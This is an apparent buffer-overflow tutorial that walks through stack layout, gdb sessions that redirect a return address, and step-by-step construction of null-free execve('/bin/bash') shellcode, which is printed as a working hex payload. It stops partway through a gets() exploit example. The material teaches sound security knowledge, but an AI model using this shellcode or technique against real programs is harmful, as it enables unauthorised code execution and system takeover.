A buffer overflow attack is a great example of how a simple software “anomaly” can lead to complete system vulnerability. This is a well-known security issue, so nothing new here. For the sake of those not familiar with it, and for cyberpunk.rs’s completeness in general, we’re going to cover the subject with simple and frequently used examples, shellcode writing, privilege escalation, prevention mechanisms, etc. This article contains mixed info based on personal experience and various online sources.
In short, a buffer overflow is a situation in which a program writes data outside a pre-defined buffer, overwriting the adjacent memory locations and redefining process/program behaviour. Ultimately this can be used to force the program to execute a custom piece of code, which can lead to anything, up to complete system access.
Whether you’re curious about the CyberSecurity or a developer trying to improve your CyberSec awareness, understanding Buffer Overflow is a great way to get a quick and in depth view of potential dangers out there, a vital step in mitigating such vulnerabilities.
It might be a good idea to overview GDB, Assembly Basics and Stack Structure Overview before proceeding.
Content:
- Buffer Overflow & Stack Details
- Buffer OverFlow Basic Example
- ShellCode: Rough Approach
- ShellCode: Execve (11)
- ShellCode: Issues (NULLs & Relative addressing)
- Example: Simple injection I
- Example: Simple injection II
- Examples: HackYou & ExploitMe
- [Anti] Prevention
- Conclusion
Buffer Overflow & Stack Details
A number of situations can lead to a buffer overflow, such as the use of unsafe types and functions, insecure copying into or access to a buffer, etc. For instance, a list of functions (C/C++) that are unsafe or easy to misuse:
– gets
– getws
– sprintf
– strcat
– strcpy
– strncpy
– scanf
– memcpy
– memmove
Using something like:
char buffer[8];
gets(buffer);
can lead to a buffer overflow since gets doesn’t check the input size. As mentioned, buffers are pieces of memory for data storage. The stack holds local (automatically allocated) variables, while the heap is used for dynamic memory allocation. Consequently, overflows can be divided into a couple of types:
- stack overflow: char name[10] = "CyberPunk";
- heap overflow: int *ptr = new int;
- index/integer overflow: int arr[10];
Buffer allocation:
HIGH
 12 |    |    | \0 | k  |
  8 | n  | u  | P  | r  |
  4 | e  | b  | y  | C  |
  0 |    |    |    |    |
LOW
Now, if you extend the input and insert something larger than the buffer itself, it’s going to overwrite adjacent memory locations, affecting the overall program/process execution. The most frequent causes of this type of vulnerability are related to the development process (or even the developers themselves: practices, unawareness, etc.): use of the previously mentioned unsafe functions that don’t perform array bounds or type-safety checks, buffer copying implemented without size verification, different compiler configurations, and situations in which a buffer is placed near vital or critical data structures in memory. Process memory layout:
HIGH
|----------------|
| | -> Command line arguments & environment vars
|----------------|
| STACK | -> Growing downwards !
|----------------|
| |
| |
| |
|----------------|
| HEAP | -> Growing upwards !
|----------------|
| bss | -> UnInitialized Vars
|----------------|
| Data | -> Initialized Vars
|----------------|
| Text |
|----------------|
LOW
Most compilers/OSs nowadays provide various overflow-checking options at compile/link time and even at runtime, along with various prevention techniques and principles, but not all of them are fully safe; some remain vulnerable to exploitation and/or circumvention.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    int num = 33;                    // STACK
    int *ptr = malloc(sizeof(int));  // HEAP (malloc here, since `new` is C++ only)
    char mybuffer[5];                // STACK
    if (argc < 2)
    {
        printf("You need some parameter!\n");
        exit(0);
    }
    strcpy(mybuffer, argv[1]);       // no bounds check: overflows when argv[1] is longer than 4 chars
    printf("mybuffer content= %s\n", mybuffer);
    return 0;
}
Before we turn to buffer overflow example, a stack sketch.
HIGH
|----------------| ------------ f1 start
|     Param2     | 12 (%EBP)
|----------------|
|     Param1     | 8 (%EBP)
|----------------|
|      RET       | 4 (%EBP)
|----------------|
|      EBP       | --> points to previous / main's frame (%EBP)
|----------------|
|   local vars   | -4 (%EBP)
|----------------| ------------ f1 end (ESP)
LOW
Function call stack structure (vulnerable strcpy):
Above illustration was taken from Henry Casanova’s course on Buffer Overflow, a great visual representation on what happens behind the scene during the function call.
chmod u+s <filename>
Buffer Overflow Basic Example
Here we’re going to play around with the buffer and call an “UnreachableFunction” just by manipulating RET pointer. Before we continue some useful gcc flags:
- -ggdb : produces debugging information specifically intended for gdb
- -mpreferred-stack-boundary=2 : changes the stack pointer alignment to a 4-byte boundary (2^2; the default is 4 => 2^4 => 16 bytes)
- -m32 : compiles a 32-bit object, useful on 64-bit systems
- -fno-stack-protector : disables stack protection (canaries)
- -z execstack : passed to the linker, enabling an “executable stack” (the opposite is noexecstack)
- -no-pie : tells gcc not to make a Position Independent Executable (PIE). PIE is a precondition for ASLR (Address Space Layout Randomization) of the binary itself, a kernel security feature that loads the binary and its dependencies at a random VM (Virtual Memory) location each time it’s run.
- -Wl,-z,norelro : disables RELRO (RELocation Read-Only), the read-only relocation table area in the final ELF (Executable and Linkable Format) where all relocations are resolved at run-time.
- -static : on some systems it overrides PIE and prevents shared library linking (might be unnecessary); no dynamic linking happens
Take this “simple” program that reads input and prints it out:
#include <stdio.h>

void UnreachableFunction(){
    printf("This shouldn't be executed!");
}

void ReadInput()
{
    char buffer[8];
    gets(buffer);
    puts(buffer);
}

int main()
{
    ReadInput();
    return 0;
}
We can try to illustrate the stack of this function:
HIGH
|----------------| ------------ ReadInput start
|                | 8 (%EBP)
|----------------|
|      RET       | 4 (%EBP) => main's "return 0"
|----------------|
|      EBP       | --> points to previous / main's frame (%EBP)
|----------------|
|   local vars   | -4 (%EBP) => buffer[8]
|                |
|----------------| ------------ ReadInput end (ESP)
LOW
$ gcc -ggdb -mpreferred-stack-boundary=2 -o bufferoverflow bufferoverflow.c
Boundary set to 2, so it’s a 4 bytes alignment. If we test the above program:
$ gdb bufferoverflow
(gdb) list
2
3       void UnreachableFunction(){
4           printf("This shouldn't be executed!");
5       }
6
7       void ReadInput()
8       {
9           char buffer[8];
10          gets(buffer);
11          puts(buffer);
(gdb)
12      }
13
14      int main()
15      {
16          ReadInput();
17          return 0;
18      }
(gdb) break 16
Breakpoint 1 at 0x121b: file bufferoverflow.c, line 16.
(gdb) break 10
Breakpoint 2 at 0x11f0: file bufferoverflow.c, line 10.
(gdb) break 11
Breakpoint 3 at 0x11fc: file bufferoverflow.c, line 11.
(gdb) disas main
Dump of assembler code for function main:
   0x0000120e <+0>:     push   %ebp
   0x0000120f <+1>:     mov    %esp,%ebp
   0x00001211 <+3>:     call   0x1227 <__x86.get_pc_thunk.ax>
   0x00001216 <+8>:     add    $0x2dea,%eax
   0x0000121b <+13>:    call   0x11de
   0x00001220 <+18>:    mov    $0x0,%eax
   0x00001225 <+23>:    pop    %ebp
   0x00001226 <+24>:    ret
End of assembler dump.
(gdb) disas ReadInput
Dump of assembler code for function ReadInput:
   0x000011de <+0>:     push   %ebp
   0x000011df <+1>:     mov    %esp,%ebp
   0x000011e1 <+3>:     push   %ebx
   0x000011e2 <+4>:     sub    $0x8,%esp
   0x000011e5 <+7>:     call   0x10c0 <__x86.get_pc_thunk.bx>
   0x000011ea <+12>:    add    $0x2e16,%ebx
   0x000011f0 <+18>:    lea    -0xc(%ebp),%eax
   0x000011f3 <+21>:    push   %eax
   0x000011f4 <+22>:    call   0x1040
   0x000011f9 <+27>:    add    $0x4,%esp
   0x000011fc <+30>:    lea    -0xc(%ebp),%eax
   0x000011ff <+33>:    push   %eax
   0x00001200 <+34>:    call   0x1050
   0x00001205 <+39>:    add    $0x4,%esp
   0x00001208 <+42>:    nop
   0x00001209 <+43>:    mov    -0x4(%ebp),%ebx
   0x0000120c <+46>:    leave
   0x0000120d <+47>:    ret
End of assembler dump.
(gdb) run
Starting program: /root/TEST_AREA/bufferoverflow/bufferoverflow
Breakpoint 1, main () at bufferoverflow.c:16
16          ReadInput();
(gdb) x/8xw $esp
0xbffff2e8:     0x00000000      0xb7dfa7e1      0x00000001      0xbffff384
0xbffff2f8:     0xbffff38c      0xbffff314      0x00000001      0x00000000
(gdb) s
Breakpoint 2, ReadInput () at bufferoverflow.c:10
10          gets(buffer);
(gdb) x/8xw $esp
0xbffff2d4:     0x00000000      0x00000000      0x00000000      0xbffff2e8
0xbffff2e4:     0x00401220      0x00000000      0xb7dfa7e1      0x00000001
The “sub $0x8,%esp” reserves the space for the buffer.
Stack looks like this:
HIGH
|----------------| ------------ f1 start
|                | 8 (%EBP)
|----------------|
|      RET       | 4 (%EBP) => 0x00401220 (Main)
|----------------|
|      EBP       | 0 (%EBP) => 0xbffff2e8
|----------------|
|   local vars   | -4 (%EBP) => 0x00000000
|                |              0x00000000
|                |              0x00000000
|----------------| ------------ f1 end (ESP)
LOW
Continuing execution:
(gdb) c
Continuing.
123456789abcdef
Breakpoint 3, ReadInput () at bufferoverflow.c:11
11          puts(buffer);
(gdb) x/8xw $esp
0xbffff2d4:     0x34333231      0x38373635      0x63626139      0x00666564
0xbffff2e4:     0x00401220      0x00000000      0xb7dfa7e1      0x00000001
(gdb) c
Continuing.
123456789abcdef
[Inferior 1 (process 2449) exited normally]
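The 0x00666564 is basically “def” followed by the terminating NUL: x86 is little-endian, so the bytes 0x64 0x65 0x66 0x00 (“d”, “e”, “f”, “\0”) appear reversed (“fed”) when displayed as one 32-bit word.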
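To make the byte order concrete, here is a small Python sketch (not part of the original session) that repacks the four words gdb printed at ESP into the bytes that actually sit in memory. It assumes a 32-bit little-endian target, as in the dump above; the helper name words_to_bytes is made up for illustration.

```python
import struct

def words_to_bytes(words):
    """Repack 32-bit words (as shown by gdb's x/xw) into little-endian memory bytes."""
    return b"".join(struct.pack("<I", w) for w in words)

# The first four words at ESP after typing 123456789abcdef
dump = [0x34333231, 0x38373635, 0x63626139, 0x00666564]
memory = words_to_bytes(dump)
print(memory)
```

Read byte by byte, the memory holds the input exactly in the order it was typed, with the NUL terminator at the end.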
So, now we have the stack looking like:
HIGH
|----------------| ------------ f1 start
|                | 8 (%EBP)
|----------------|
|      RET       | 4 (%EBP) => 0x00401220 (Main)
|----------------|
|      EBP       | 0 (%EBP) => 0x00666564
|----------------|
|   local vars   | -4 (%EBP) => 0x63626139
|                |              0x38373635
|                |              0x34333231
|----------------| ------------ f1 end (ESP)
LOW
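Although we’ve overwritten the saved EBP, RET is intact and the program is still holding. Add another char (123456789abcdefg) and things start to go downhill: the terminating NUL that gets() appends now lands on the lowest byte of RET, turning 0x00401220 into 0x00401200: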
(gdb) x/8xw $esp
0xbffff2d4:     0x34333231      0x38373635      0x63626139      0x67666564
0xbffff2e4:     0x00401200      0x00000000      0xb7dfa7e1      0x00000001
(gdb) c
Continuing.
123456789abcdefg
Program received signal SIGSEGV, Segmentation fault.
0x00401050 in puts@plt ()
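The effect of one extra character can be reproduced without a debugger. The sketch below is only a model, assuming the frame layout seen in the dumps above (12 bytes of locals, then the saved EBP, then RET) and the fact that gets() appends a terminating NUL; the function name overflow is hypothetical.

```python
import struct

SAVED_EBP = 0xbffff2e8
RET = 0x00401220

def overflow(user_input):
    """Model an unchecked copy into the frame and return the resulting RET value."""
    # 12 bytes of locals (8-byte buffer + saved EBX), saved EBP, RET
    frame = bytearray(12) + struct.pack("<I", SAVED_EBP) + struct.pack("<I", RET)
    data = user_input + b"\x00"      # gets() stores a terminating NUL
    frame[:len(data)] = data         # no bounds check, just like gets()
    return struct.unpack_from("<I", frame, 16)[0]

print(hex(overflow(b"123456789abcdef")))    # 15 chars: RET untouched
print(hex(overflow(b"123456789abcdefg")))   # 16 chars: NUL hits RET's low byte
print(hex(overflow(b"123456789abcdefg\xb9\x11\x40")))  # three extra bytes + NUL
```

In this model, three attacker-chosen bytes plus the NUL supplied by gets() are enough to replace all four bytes of RET.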
Ok, now, what if we would like to reach the “UnreachableFunction()”? Let’s see:
(gdb) disas UnreachableFunction
Dump of assembler code for function UnreachableFunction:
   0x004011b9 <+0>:     push   %ebp
   0x004011ba <+1>:     mov    %esp,%ebp
   0x004011bc <+3>:     push   %ebx
   0x004011bd <+4>:     call   0x401227 <__x86.get_pc_thunk.ax>
   0x004011c2 <+9>:     add    $0x2e3e,%eax
   0x004011c7 <+14>:    lea    -0x1ff8(%eax),%edx
   0x004011cd <+20>:    push   %edx
   0x004011ce <+21>:    mov    %eax,%ebx
   0x004011d0 <+23>:    call   0x401030
   0x004011d5 <+28>:    add    $0x4,%esp
   0x004011d8 <+31>:    nop
   0x004011d9 <+32>:    mov    -0x4(%ebp),%ebx
   0x004011dc <+35>:    leave
   0x004011dd <+36>:    ret
End of assembler dump.
Let’s try it:
$ printf "123456789abcdefg\xb9\x11\x40" | ./bufferoverflow
123456789abcdefg�@
Segmentation fault
We might be missing the ‘\n’:
void UnreachableFunction(){ printf("This shouldn't be executed!\n"); }
$ printf "123456789abcdefg\xb9\x11\x40" | ./bufferoverflow
123456789abcdefg�@
Illegal instruction
Adding exit(0):
void UnreachableFunction(){ printf("This shouldn't be executed!\n"); exit(0); }
..and yes, finally we’re landing where we should:
$ printf "123456789abcdefg\xb9\x11\x40" | ./bufferoverflow
123456789abcdefg�@
This shouldn't be executed!
This can/should be debugged, and you can do that by placing the input value into a file:
$ printf "123456789abcdefg\xb9\x11\x40" > input
and then calling that file within gdb:
(gdb) run < input
ShellCode: Rough Approach
As we saw in the previous example, by gaining control of RET (the return address) we can point execution to basically anything, e.g. our own executable payload. That payload is nothing more than machine code executed by the CPU, and it is what is called shellcode. Most often that code is used to get access to a shell, hence the name. Take a small example of an exit call:
#include <stdlib.h>

int main()
{
    exit(0);
}
By disassembling this we can see the core of it:
$ gdb main
(gdb) disas _exit
Dump of assembler code for function _exit:
   0x0806bffa <+0>:     mov    0x4(%esp),%ebx
   0x0806bffe <+4>:     mov    $0xfc,%eax
   0x0806c003 <+9>:     call   *%gs:0x10
   0x0806c00a <+16>:    mov    $0x1,%eax
   0x0806c00f <+21>:    int    $0x80
   0x0806c011 <+23>:    hlt
End of assembler dump.
We can build a ShellCode of this:
.text
.globl _start
_start:
    movl $20, %ebx    # STATUS
    movl $1, %eax     # EXIT_SYSTEM_CALL
    int $0x80         # INTERRUPT
Assemble this:
$ as -o ExitSC.o ExitSC.s
and link it:
$ ld -o ExitSC ExitSC.o
Dump it:
$ objdump -d ExitSC
ExitSC:     file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
 8049000:       bb 14 00 00 00          mov    $0x14,%ebx
 8049005:       b8 01 00 00 00          mov    $0x1,%eax
 804900a:       cd 80                   int    $0x80
Write this into a code:
#include <stdio.h>

char shellcode[] = "\xbb\x14\x00\x00\x00"
                   "\xb8\x01\x00\x00\x00"
                   "\xcd\x80";

int main (){
}
Compile it and verify status. Don’t forget execstack (Segmentation Fault might occur without it):
$ gcc -ggdb -z execstack -mpreferred-stack-boundary=2 -o ShellCode ShellCode.c
$ ./ShellCode
$ echo $?
20
Ok, now, extend it:
#include <stdio.h>

char shellcode[] = "\xbb\x14\x00\x00\x00"
                   "\xb8\x01\x00\x00\x00"
                   "\xcd\x80";

int main (){
    int *ret;
    ret = (int *) &ret +2;
    (*ret) = (int)shellcode;
}
Run GDB and break at line “ret = (int *) &ret +2” :
(gdb) run
Starting program: /cyberpunk/TEST_AREA/bufferoverflow/ShellCode
Breakpoint 1, main () at ShellCode.c:9
9           ret = (int *) &ret +2;
(gdb) x/8xw $esp
0xbffff304:     0xb7fb3000      0x00000000      0xb7dfa7e1      0x00000001
0xbffff314:     0xbffff3a4      0xbffff3ac      0xbffff334      0x00000001
(gdb) print /x ret
$1 = 0xb7fb3000
Checking the Return Address:
(gdb) disas 0xb7dfa7e1
Dump of assembler code for function __libc_start_main:
   0xb7dfa6f0 <+0>:     call   0xb7f14a69 <__x86.get_pc_thunk.ax>
   0xb7dfa6f5 <+5>:     add    $0x1b890b,%eax
libc is responsible for setting up the environment of a program before calling the main function, and when main returns, libc cleans up. If we take a closer look at ret = (int *) &ret +2:
- &ret : the location where ret is stored (top of the stack, 0xbffff304, currently holding 0xb7fb3000)
- +2 : adds 2 integer sizes, or 8 bytes, making ret point to RET (0xbffff30c, holding 0xb7dfa7e1)
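The pointer arithmetic can be checked against the stack dump from the breakpoint. This is a minimal Python sketch assuming 4-byte ints on the 32-bit target; the dictionary simply copies the first row of the x/8xw output, and the variable names are illustrative only.

```python
INT_SIZE = 4  # sizeof(int) on the 32-bit target (assumption)

# First row of the x/8xw $esp dump, keyed by address
stack = {
    0xbffff304: 0xb7fb3000,  # ret (uninitialised local)
    0xbffff308: 0x00000000,  # saved EBP
    0xbffff30c: 0xb7dfa7e1,  # RET into __libc_start_main
    0xbffff310: 0x00000001,  # argc
}

addr_of_ret_var = 0xbffff304
target = addr_of_ret_var + 2 * INT_SIZE   # what (int *)&ret + 2 evaluates to
print(hex(target), hex(stack[target]))
```

The computed address matches the value gdb shows for ret after the assignment, and the word stored there is the return address into libc.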
The next line, (*ret) = (int)shellcode, simply replaces the value of RET (0xb7dfa7e1) with the address of our shellcode. Continuing the execution:
(gdb) s
10          (*ret) = (int)shellcode;
(gdb) x/8xw $esp
0xbffff304:     0xbffff30c      0x00000000      0xb7dfa7e1      0x00000001
0xbffff314:     0xbffff3a4      0xbffff3ac      0xbffff334      0x00000001
(gdb) print &shellcode
$2 = (char (*)[13]) 0x404018
(gdb) s
11      }
(gdb) x/8xw $esp
0xbffff304:     0xbffff30c      0x00000000      0x00404018      0x00000001
0xbffff314:     0xbffff3a4      0xbffff3ac      0xbffff334      0x00000001
Shellcode: execve (11)
By checking the man pages, the execve (system call #11) executes a new program:
int execve ( const char *filename, char *const argv[], char *const envp[] );
With that in mind, the C code (equivalent) that spawns a new shell would look something like:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* declares execve */

int main ()
{
    char *args[2];
    args[0]="/bin/bash";
    args[1]=NULL;
    execve(args[0], args, NULL);
    exit(0);
}
Compile it:
$ gcc -static -z execstack -mpreferred-stack-boundary=2 -o shell shell.c
$ gdb shell
(gdb) disas main
Dump of assembler code for function main:
   0x08049b05 <+0>:     push   %ebp
   0x08049b06 <+1>:     mov    %esp,%ebp
   0x08049b08 <+3>:     push   %ebx
   0x08049b09 <+4>:     sub    $0x8,%esp
   0x08049b0c <+7>:     call   0x80499e0 <__x86.get_pc_thunk.bx>
   0x08049b11 <+12>:    add    $0x914ef,%ebx
   0x08049b17 <+18>:    lea    -0x2dff8(%ebx),%eax
   0x08049b1d <+24>:    mov    %eax,-0xc(%ebp)
   0x08049b20 <+27>:    movl   $0x0,-0x8(%ebp)
   0x08049b27 <+34>:    mov    -0xc(%ebp),%eax
   0x08049b2a <+37>:    push   $0x0
   0x08049b2c <+39>:    lea    -0xc(%ebp),%edx
   0x08049b2f <+42>:    push   %edx
   0x08049b30 <+43>:    push   %eax
   0x08049b31 <+44>:    call   0x806c030
   0x08049b36 <+49>:    add    $0xc,%esp
   0x08049b39 <+52>:    push   $0x0
   0x08049b3b <+54>:    call   0x8050050
End of assembler dump.
As you can see, it’s a bit “messed up” by the additional code (__x86.get_pc_thunk.bx). To make it more readable you can try compiling it with -fno-pic (not using position-independent code [PIC]):
$ gcc -static -fno-pic -z execstack -mpreferred-stack-boundary=2 -o shell shell.c
Now, doing the disassembling provides a bit cleaner code:
(gdb) disas main
Dump of assembler code for function main:
   0x08049b05 <+0>:     push   %ebp
   0x08049b06 <+1>:     mov    %esp,%ebp
   0x08049b08 <+3>:     sub    $0x8,%esp
   0x08049b0b <+6>:     movl   $0x80ad008,-0x8(%ebp)
   0x08049b12 <+13>:    movl   $0x0,-0x4(%ebp)
   0x08049b19 <+20>:    mov    -0x8(%ebp),%eax
   0x08049b1c <+23>:    push   $0x0
   0x08049b1e <+25>:    lea    -0x8(%ebp),%edx
   0x08049b21 <+28>:    push   %edx
   0x08049b22 <+29>:    push   %eax
   0x08049b23 <+30>:    call   0x806c030
   0x08049b28 <+35>:    add    $0xc,%esp
   0x08049b2b <+38>:    push   $0x0
   0x08049b2d <+40>:    call   0x8050050
End of assembler dump.
Let’s try and illustrate the stack by checking the code:
HIGH
|----------------|
|                |
|----------------|
|    EBP old     |  1. push %ebp
|----------------| <--- EBP  2. mov %esp,%ebp
|    0 / NULL    |  5. movl $0x0,-0x4(%ebp)
|----------------|  6. mov -0x8(%ebp),%eax
| P( /bin/bash)  | <--- 6. EAX, 8. EDX  4. movl $0x80ad008,-0x8(%ebp)
|----------------|  3. sub $0x8,%esp
|    0 / NULL    |  7. push $0x0
|----------------|
|      EDX       |  9. push %edx
|----------------|  8. lea -0x8(%ebp),%edx
|      EAX       |  10. push %eax
|----------------| <--- ESP
LOW
(1) push the EBP on to the stack, (2) moving the EBP to the top of the stack / ESP, (3) moving the ESP 8 bytes down, (4) moving 0x80ad008 content 8 bytes below EBP. Further inspection of the addr “0x80ad008“:
(gdb) x/1s 0x80ad008
0x80ad008: "/bin/bash"
(5) setting 0 (NULL) 4 bytes below EBP, (6) copying the word 8 bytes below EBP to EAX => pointer to “/bin/bash”, (7) pushing 0 (NULL) onto the stack, (8) loading into EDX the address of the word 8 bytes below EBP => pointer to the argv array [“/bin/bash”, NULL], (9) pushing EDX onto the stack, (10) pushing EAX onto the stack.
Building the shellcode:
.data
bash:
    .asciz "/bin/bash"
null1:
    .int 0
bashAddress:
    .int 0
null2:
    .int 0

.text
.globl _start
_start:
    movl $bash, bashAddress     # pointer to bash => bashAddress addr
    movl $11, %eax              # EAX = 11 (sys call for execve)
    movl $bash, %ebx            # bash pointer / string addr => EBX
    movl $bashAddress, %ecx     # pointer to the array of arguments => ECX
    movl $null2, %edx           # env pointer array => no envp / NULL
    int $0x80
exit:
    movl $10, %ebx
    movl $1, %eax
    int $0x80
The data is basically structured like an array of pointers, sequentially positioned in memory. Looking at the function:
int execve ( const char *filename, char *const argv[], char *const envp[] );
- EAX : execve (syscall 11)
- EBX : filename pointer (/bin/bash)
- ECX : arguments [ “/bin/bash”, NULL ]
- EDX : [ NULL ]
Interrupt at the end (0x80) triggers the execution. Assemble this:
$ as -ggstabs -o shell.o shell.s
and link it:
$ ld -o shell shell.o
Inspect it:
$ objdump -d shell
shell:     file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
 8049000:       c7 05 0e a0 04 08 00    movl   $0x804a000,0x804a00e
 8049007:       a0 04 08
 804900a:       b8 0b 00 00 00          mov    $0xb,%eax
 804900f:       bb 00 a0 04 08          mov    $0x804a000,%ebx
 8049014:       b9 0e a0 04 08          mov    $0x804a00e,%ecx
 8049019:       ba 12 a0 04 08          mov    $0x804a012,%edx
 804901e:       cd 80                   int    $0x80
08049020 <exit>:
 8049020:       bb 0a 00 00 00          mov    $0xa,%ebx
 8049025:       b8 01 00 00 00          mov    $0x1,%eax
 804902a:       cd 80                   int    $0x80
The 0x804a000 contains the string. Alignment maybe looks messed up, but all vars are packed in 22 bytes:
(gdb) x/8xw 0x804a000
0x804a000:      0x6e69622f      0x7361622f      0x00000068      0xa0000000
0x804a010:      0x00000804      0x00000000      0x0000001c      0x00000002
6e 69 62 2f   73 61 62 2f   68 00
n  i  b  /    s  a  b  /    h       => /bin/bash
Since they’re sequentially placed:
- bash is at 0x804a000 (9 chars/bytes + zero byte)
- null1 is at 0x804a00a (4 bytes), val : 0x00000000
- bashAddress is at 0x804a00e (4 bytes), val : 0x0804a000
- null2 is at 0x804a012 (4 bytes), val: 00000000
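The addresses in this list follow directly from the sizes of the four data items. A short Python sketch, assuming the .data section starts at 0x804a000 as in the objdump output and that the assembler adds no padding between the items:

```python
BASE = 0x804a000  # start of .data, taken from the objdump output

# (label, size in bytes) in declaration order
items = [
    ("bash", len(b"/bin/bash\x00")),  # .asciz adds the terminating zero byte
    ("null1", 4),
    ("bashAddress", 4),
    ("null2", 4),
]

addresses = {}
offset = 0
for label, size in items:
    addresses[label] = BASE + offset
    offset += size

for label, addr in addresses.items():
    print(f"{label:12s} {addr:#x}")
print("total bytes:", offset)
```

The total matches the 22 bytes mentioned above, and the odd-looking addresses are simply the result of the 10-byte string coming first.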
ShellCode: Issues
There are a couple of problems when it comes to shellcode.
Shellcode can’t contain NULL bytes (0x00), and looking at our “shell” objdump output there are a lot of zeros (00). When the payload is delivered through string functions, a zero byte signifies the end of the string (char buf), so everything after it is dropped and the code can’t be used as is. Solution: replace NULL values.
The second issue is that the values/addresses are hardcoded, so it will not work on all systems. Solution: use relative addressing.
We’ll start with the solution right away:
.data
.globl _start
_start:
    jmp CustomJump
ShellCode:
    popl %esi
    xorl %eax, %eax
    movb %al, 0x9(%esi)     # replace A with 0
    movl %esi, 0xa(%esi)    # pointer to bash on BBBB
    movl %eax, 0xe(%esi)    # place a 0 on CCCC
    movb $11, %al           # eax => 11 (syscall, execve)
    movl %esi, %ebx         # ebx => bash string
    leal 0xa(%esi), %ecx    # ecx => argv [ bash, null ]
    leal 0xe(%esi), %edx    # edx => envp [ null ]
    int $0x80
CustomJump:
    call ShellCode
ShellVars:
    .ascii "/bin/bashABBBBCCCC"
This approach excludes “null” values and uses relative addressing. When we jump to “CustomJump” and call “ShellCode”, the call pushes the address of whatever follows it, which is our ascii variable, and “popl %esi” loads that address into ESI. So, we’re relying on ESI for relative addressing.
|     filename      |   |  argv  |
  / b i n / b a s h   A   B B B B   C C C C
  |                   |   |         |
  ESI                0x9 0xA       0xE
We’re immediately replacing the “A” with 0 (al, the lowest byte of EAX). If we check the “execve” function call:
int execve ( const char *filename, char *const argv[], char *const envp[] );
- syscall : EAX => 11
- filename (string) : EBX => ESI (/bin/bash)
- argv (pointer to the argument array) : ECX => ESI + 0xA (BBBBCCCC)
- envp : EDX => ESI + 0xE (CCCC)
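The three offsets used by the shellcode can be read straight off the placeholder string. A small Python sketch to double-check them (the variable names are illustrative only):

```python
template = b"/bin/bashABBBBCCCC"

off_terminator = template.index(b"A")     # byte that becomes the string's NUL
off_argv = template.index(b"BBBB")        # slot for the pointer to "/bin/bash"
off_envp = template.index(b"CCCC")        # slot for the NULL that ends argv / is envp

print(hex(off_terminator), hex(off_argv), hex(off_envp), len(template))
```

The placeholders only reserve space: at run time the shellcode overwrites them with a zero byte, the string address and a zero word, so no NULL has to be present in the payload itself.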
Compared to the previous example, this is pretty efficient. Instead of 22 bytes of data we’re now using 18 bytes, there are no NULLs (0’s) and it uses relative addressing. We’re not done. Assemble, link and dump it:
$ as -o shellclean.o shellclean.s
$ ld -o shellclean shellclean.o
$ objdump -D shellclean
shellclean:     file format elf32-i386
Disassembly of section .data:
08049000 <_start>:
 8049000:       eb 18                   jmp    804901a
08049002 <ShellCode>:
 8049002:       5e                      pop    %esi
 8049003:       31 c0                   xor    %eax,%eax
 8049005:       88 46 09                mov    %al,0x9(%esi)
 8049008:       89 76 0a                mov    %esi,0xa(%esi)
 804900b:       89 46 0e                mov    %eax,0xe(%esi)
 804900e:       b0 0b                   mov    $0xb,%al
 8049010:       89 f3                   mov    %esi,%ebx
 8049012:       8d 4e 0a                lea    0xa(%esi),%ecx
 8049015:       8d 56 0e                lea    0xe(%esi),%edx
 8049018:       cd 80                   int    $0x80
0804901a <CustomJump>:
 804901a:       e8 e3 ff ff ff          call   8049002
0804901f <ShellVars>:
 804901f:       2f                      das
 8049020:       62 69 6e                bound  %ebp,0x6e(%ecx)
 8049023:       2f                      das
 8049024:       62 61 73                bound  %esp,0x73(%ecx)
 8049027:       68 41 42 42 42          push   $0x42424241
 804902c:       42                      inc    %edx
 804902d:       43                      inc    %ebx
 804902e:       43                      inc    %ebx
 804902f:       43                      inc    %ebx
 8049030:       43                      inc    %ebx
As we can see, there are no NULLs. As before, proceed converting this shellcode to C. To avoid “manually” doing this, find some helper functions out there (bash or some scripts), e.g.:
$ for i in $(objdump -D shellclean -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43
We’re using -D (forcing disassembly of all sections), but you can or should be able to use -d (only code sections).
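Rather than scanning the dump by eye, the “no NULLs” claim can be checked mechanically. The Python sketch below compares the earlier exit shellcode with the clean one; the byte strings are copied from the dumps in this article and the helper null_offsets is a made-up name.

```python
def null_offsets(code):
    """Return the offsets of every 0x00 byte in a shellcode byte string."""
    return [i for i, b in enumerate(code) if b == 0]

exit_sc = b"\xbb\x14\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80"

clean_sc = (
    b"\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89"
    b"\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e"
    b"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
)

print("exit shellcode NULs at:", null_offsets(exit_sc))
print("clean shellcode NULs at:", null_offsets(clean_sc))
```

An empty list for the second payload means a string-based copy would carry it over in full.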
#include <stdio.h>

char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89"
                   "\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e"
                   "\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
                   "\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

int main (){
    int *ret;
    ret = (int *) &ret +2;
    (*ret) = (int)shellcode;
}
$ gcc -ggdb -z execstack -mpreferred-stack-boundary=2 -o ShellShellCode ShellClean.c
Buffer overflow attack: Example I
The gets() function might be easy to overflow, but it can be tricky to get a shell since stdin is closed/exhausted once the input has been read, so the spawned shell exits right away. We’ll go over that.
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);
    return 0;
}
$ gcc -ggdb -mpreferred-stack-boundary=2 -o simple1 simple1.c
Running this with more than 64 chars:
$ python -c "print 'A' * 100" | ./simple1
Segmentation fault
Finding the buffer size with Metasploit
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
